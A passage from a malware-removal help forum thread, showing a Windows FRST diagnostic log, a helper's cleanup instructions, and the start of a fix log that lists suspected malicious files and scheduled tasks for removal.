FirewallRules: [TCP Query User{813FD61F-108E-4C8F-8713-5C5C65A07F20}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{94D1C3B8-E5D6-406D-8550-D0FB1A8AFD18}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{EBCB1A48-8CAD-40A0-97C9-A5E7D1969006}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [UDP Query User{51B1713E-C3DC-4E9B-8B2E-299D5D7EB37D}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [{AD675AD4-8A27-4858-B7BF-64062E576C45}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{FF4764D4-F4A6-4C99-B73E-53F8DE61E6F9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{61F7EE47-9BA9-4D47-ADB6-5E48B1DF1F11}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [TCP Query User{9DA426E5-870A-46BA-ACD6-3BECCA6D3981}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{E35C77F8-2476-4F58-B62F-633DD6DA4D7B}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{64ADE5CF-E0E0-432A-ADCA-107CEF11A830}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{29E89790-5F1F-403F-9200-85040488F6BF}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{051C8ED1-8257-4C07-9843-3A321CB1D2B5}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{11E9C41A-BB10-4AE0-86A2-D113F4631726}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{1028E6BB-11FD-426E-9846-980F150B8359}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [UDP Query User{131B9741-3987-48AB-97A9-8EB722A5AD2D}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [{10CC44FD-3D7B-40D9-B4E9-C8B90B3CDA05}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{0F44D93E-8116-4C28-A09E-375525612959}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{DE2D1B1A-A95A-4427-8BD7-97016C528F99}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{023EC48C-AAA6-4832-8DEF-E77068991D61}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{ED5D1E50-0E04-48A8-A0FF-52EBBC8DC18D}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe No File
FirewallRules: [{A9B6A8FC-243F-45C5-B45E-B94CA201DFA7}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{59B2491E-5BF2-4DC5-AE8D-F34BD2AC1230}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{EF33A6D0-D34B-4630-9AE0-D5B6319C642D}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{0C8E4F25-226B-4BC9-BBD0-A6FDD1D99E01}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{E5EC7B01-738D-42B0-960C-4051ADBF6E85}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{28B9FA2D-E66B-453A-9DAB-DDB820A60893}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{2F79B4C8-3AFC-4E30-B1B2-EE4203877302}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{FEE98E1E-A352-4C6D-A55F-F641B4E69F55}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{A16DB9E7-288D-4E5B-BD58-5404E7DED756}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{986F830C-A0F0-4829-A1D3-6E209C9346FE}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{7AB977CD-EA90-4ECA-865F-E3924B0DEBC6}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9FDF76F3-5DF0-4A94-B6C4-F6F10388EEDD}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9E97B312-F759-4491-9B4A-9A7F7BD66B49}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{3B74B220-3059-4A75-949E-50972E487A28}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{187F27A2-9AE2-489B-B927-B8FC03CC268B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{A9130200-545F-467A-9A36-1B798C073847}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{7F1F91ED-8AE2-4EF5-8A6E-42BCE82D179B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{5DEA6D27-54CF-4606-949E-BD3C17E5B786}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [TCP Query User{DF58AEE1-F55F-4C53-ADDB-ACE482856AE1}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{872BEA53-323F-4801-81BF-7FFB853B9696}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{8EB9B601-87D3-4318-8ED9-03D843F1590B}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{597233C9-A6EB-4645-8677-888825AFC9CE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{4077A009-74D8-44BE-AD00-C76EEF7EE5BD}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [{DAE1B584-4569-4BAB-B953-D64ABABDAAD5}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [TCP Query User{3B57E49F-50A7-468F-A210-D44AA14F7EE4}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [UDP Query User{13BD579F-4B71-49B9-9983-2D442B1932E8}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [{CF745F74-D653-4FD3-8D0D-19E40F7120AE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{AB407DB0-7E44-4FFA-A876-AC39F106ECB0}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{6D250D03-52C1-4019-980F-9AC5B16C218B}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [{79C5FF69-9C6C-4795-BBBF-8058548DF184}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C22CAF2C-8CE3-4B0E-B3E7-5A8C676B5F8E}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
FirewallRules: [UDP Query User{DCFA2E94-61CF-4517-A82F-AA51C00BB916}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
FirewallRules: [{9B9900F7-F341-4F67-A222-BA5ADB3D415F}] => (Block) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WShelper.exe No File
FirewallRules: [{C27B1110-1C16-4970-BA34-D7815EC04CD1}] => (Allow) c:\program files (x86)\opera\63.0.3368.107\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{5F4157A8-99BC-42D7-9E0B-83BC577FB74E}] => (Allow) c:\program files (x86)\opera\64.0.3417.92\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{E312F188-3203-4E00-8BD8-6B9B54F77B8A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
 
==================== Restore Points =========================
 
16-11-2019 17:22:21 Removed Betternet for Windows 5.3.0.433
 
==================== Faulty Device Manager Devices ============
 
 
==================== Event log errors: ========================
 
Application errors:
==================
Error: (11/18/2019 06:33:18 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\TIS_Windows7PIM.dll".
Dependent Assembly Microsoft.VC80.DebugCRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/18/2019 06:30:28 AM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nero\Nero8\Nero Toolkit\DiscSpeed.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_fa62ad231704eab7.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd.manifest.
 
Error: (11/17/2019 06:59:21 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\TIS_Windows7PIM.dll".
Dependent Assembly Microsoft.VC80.DebugCRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/17/2019 06:56:25 AM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nero\Nero8\Nero Toolkit\DiscSpeed.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_fa62ad231704eab7.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd.manifest.
 
Error: (11/16/2019 05:45:44 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Avira.WebAppHost.exe, version: 2.26.1.17471, time stamp: 0x5d1b0ae0
Faulting module name: KERNELBASE.dll, version: 6.1.7600.17206, time stamp: 0x50e669a2
Exception code: 0xe0434352
Fault offset: 0x000000000000ac3d
Faulting process id: 0x1384
Faulting application start time: 0x01d59c9d496b5e25
Faulting application path: C:\Program Files (x86)\Avira\VPN\Avira.WebAppHost.exe
Faulting module path: C:\Windows\system32\KERNELBASE.dll
Report Id: 87d7a1fc-0890-11ea-992a-2cd44493347b
 
Error: (11/16/2019 05:45:44 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: Avira.WebAppHost.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.IO.IOException
Stack:
   at System.IO.__Error.WinIOError(Int32, System.String)
   at System.IO.Directory.InternalCreateDirectory(System.String, System.String, System.Object, Boolean)
   at System.IO.Directory.InternalCreateDirectoryHelper(System.String, Boolean)
   at Avira.VPN.Core.Win.XmlStorage.EnsureFileExists(System.String)
   at Avira.VPN.Core.Win.ProductSettings.get_ClientId()
   at Avira.VPN.Core.Win.GeneratedDeviceInfo.GetClientId()
   at Avira.VPN.Core.Win.Logger.SetDefaultInstance(System.String)
   at Avira.WebAppHost.Program.Main(System.String[])
 
Error: (11/16/2019 05:45:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Avira.VpnService.exe, version: 2.26.1.17464, time stamp: 0x5d1b0ad1
Faulting module name: KERNELBASE.dll, version: 6.1.7600.17206, time stamp: 0x50e669a2
Exception code: 0xe0434352
Fault offset: 0x000000000000ac3d
Faulting process id: 0x410
Faulting application start time: 0x01d59c9d3e008838
Faulting application path: C:\Program Files (x86)\Avira\VPN\Avira.VpnService.exe
Faulting module path: C:\Windows\system32\KERNELBASE.dll
Report Id: 7c39111e-0890-11ea-992a-2cd44493347b
 
Error: (11/16/2019 05:45:25 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: Avira.VpnService.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.IO.IOException
Stack:
   at System.IO.__Error.WinIOError(Int32, System.String)
   at System.IO.Directory.InternalCreateDirectory(System.String, System.String, System.Object, Boolean)
   at System.IO.Directory.InternalCreateDirectoryHelper(System.String, Boolean)
   at Avira.VPN.Core.Win.XmlStorage.EnsureFileExists(System.String)
   at Avira.VPN.Core.Win.ProductSettings.get_ClientId()
   at Avira.VPN.Core.Win.GeneratedDeviceInfo.GetClientId()
   at Avira.VPN.Core.Win.Logger.SetDefaultInstance(System.String)
   at Avira.VpnService.Program.Main(System.String[])
 
 
System errors:
=============
Error: (11/18/2019 02:02:49 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (11/18/2019 01:55:46 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Hotspot Shield Service service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/18/2019 01:55:46 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Hotspot Shield Service service to connect.
 
Error: (11/18/2019 01:55:14 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Freemake Improver service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/18/2019 01:55:14 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Freemake Improver service to connect.
 
Error: (11/17/2019 12:22:01 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (11/17/2019 12:16:26 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Hotspot Shield Service service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/17/2019 12:16:26 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Hotspot Shield Service service to connect.
 
 
CodeIntegrity:
===================================
 
Date: 2019-11-18 14:50:24.854
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 14:42:32.679
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 14:17:39.679
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 13:59:29.956
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 13:52:56.204
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 13:40:37.935
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 13:22:57.872
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 11:49:09.688
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
==================== Memory info =========================== 
 
BIOS: FUJITSU // Phoenix Technologies Ltd. Version 1.08 10/02/2012
Motherboard: FUJITSU FJNBB29
Processor: Intel® Pentium® CPU B960 @ 2.20GHz
Percentage of memory in use: 96%
Total physical RAM: 3447.63 MB
Available physical RAM: 117.55 MB
Total Virtual: 6893.39 MB
Available Virtual: 2494.93 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:97.56 GB) (Free:18.94 GB) NTFS
Drive d: (New Volume) (Fixed) (Total:368.1 GB) (Free:203.89 GB) NTFS
 
\\?\Volume{da4eedc3-7be1-11e2-8ac3-806e6f6e6963}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
 
==================== MBR & Partition Table ====================
 
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: EB90EB90)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=368.1 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt =======================

  • 0

#4
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

Uninstall

 

Hotspot Shield

RelevantKnowledge

Nero 8

Nokia PC Suite

 

 

Download the attached fixlist.txt to the same location as FRST

Attached File  fixlist.txt   16.79KB   459 downloads

Run FRST and press Fix
A fix log will be generated please post that

Reboot if the fix doesn't reboot it for you

Run FRST again as before.  Make sure Addition.txt is checked and hit Scan.  Post both logs.

 


  • 0

#5
vladana_91

vladana_91

    Member

  • Topic Starter
  • Member
  • PipPip
  • 18 posts

I uninstalled all the programs listed but before I continue - is it normal to get this error window saying "AutoIt Error, Line 17928 (File “C:\Users\Vladana\Desktop\FRST64.exe”): Error Variable used without being declared." when I run FRST and press Fix?

 

I did get a fixlog file, but I don't know if I was supposed to get this error window?

 

 


Edited by vladana_91, 18 November 2019 - 01:12 PM.

  • 0

#6
vladana_91

vladana_91

    Member

  • Topic Starter
  • Member
  • PipPip
  • 18 posts

Okay, under assumption that error window is was supposed to appear, I followed your instructions further, so here is the copy of Fixlog.txt:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019
Ran by Vladana (18-11-2019 19:53:29) Run:3
Running from C:\Users\Vladana\Desktop
Loaded Profiles: Vladana (Available Profiles: Vladana)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
Task: {0D4A518A-DF9A-4EF5-B2C9-BCCA25713362} - System32\Tasks\{3A66CE80-4733-4203-9F7A-462BED78E89F} => C:\Windows\system32\pcalua.exe -a E:\Boot\Setup.exe -d E:\
Task: {BA2E555B-536B-40B0-8F32-8AE50F08B90F} - System32\Tasks\igfxhk => C:\Users\Vladana\AppData\Roaming\Terq\srvce.exe
C:\Users\Vladana\AppData\Roaming\Terq
Task: {D00D3C68-28B6-430D-83FD-061E0EAFCDA9} - System32\Tasks\{9194DE95-4B06-4F9D-B927-18DB5B401FBF} => C:\Windows\system32\pcalua.exe -a C:\Users\Vladana\AppData\Local\TNT2\2.0.0.1534\TNT2User.exe -c /UNINSTALL PARTNER=10513
C:\Users\Vladana\AppData\Local\TNT2
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} -  No File
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} -  No File
Handler: WSKVAllmytubechrome - {91AB862D-07B8-4A85 -  No File
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: pokki.com/PokkiDownloadHelper -> C:\Users\Vladana\AppData\Local\Pokki\Download Helper\npPokkiDownloadHelper.1.2.0.78.dll [No File]
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: torrents-time.com/TTPlugin -> C:\Program Files (x86)\TorrentsTime Media Player\bin\npTTPlugin.dll [No File]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [jbolfgndggfhhpbnkgnpjkfhinclbigj] - <no Path/update_url>
S3 WsDrvInst; C:\Program Files (x86)\iSkysoft\iSkysoft iTransfer\DriverInstall.exe [X]
U3 avgbu57v; C:\Windows\System32\Drivers\avgbu57v.sys [0 0000-00-00] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U4 ekrn; no ImagePath
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
CMD: dir C:\Windows\Wget
CMD: dir C:\Windows\Curl
CMD: type c:\windows\e.bat
CMD: type c:\windows\y.txt
CMD: type c:\windows\d.bat
CMD: type C:\Windows\mgr_n.reg
CMD: type  C:\Windows\mgr_f.reg
CMD: type  C:\Windows\e.reg
VirusTotal: C:\Windows\e.exe
VirusTotal: C:\Windows\d.exe
VirusTotal: C:\Windows\fr.exe
2019-11-17 00:17 - 2019-10-21 20:51 - 000002930 _____ C:\Windows\e.bat
2019-11-17 00:17 - 2019-07-30 17:00 - 000004608 _____ () C:\Windows\e.exe
2019-11-17 00:16 - 2019-09-12 17:27 - 000025600 _____ () C:\Windows\fr.exe
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\Wget
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\curl
2019-11-16 16:28 - 2019-10-12 19:40 - 000004608 _____ () C:\Windows\d.exe
2019-11-16 16:28 - 2019-09-12 15:16 - 000001241 _____ C:\Windows\d.bat
2019-11-16 16:28 - 2019-08-09 16:30 - 000000001 _____ C:\Windows\y.txt
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_n.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_f.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000290 _____ C:\Windows\e.reg
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{62634D95-960B-4834-8E71-A70408AD8FD9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{84EB3779-151B-4C71-AEF0-A0FEE9481401}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.23\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
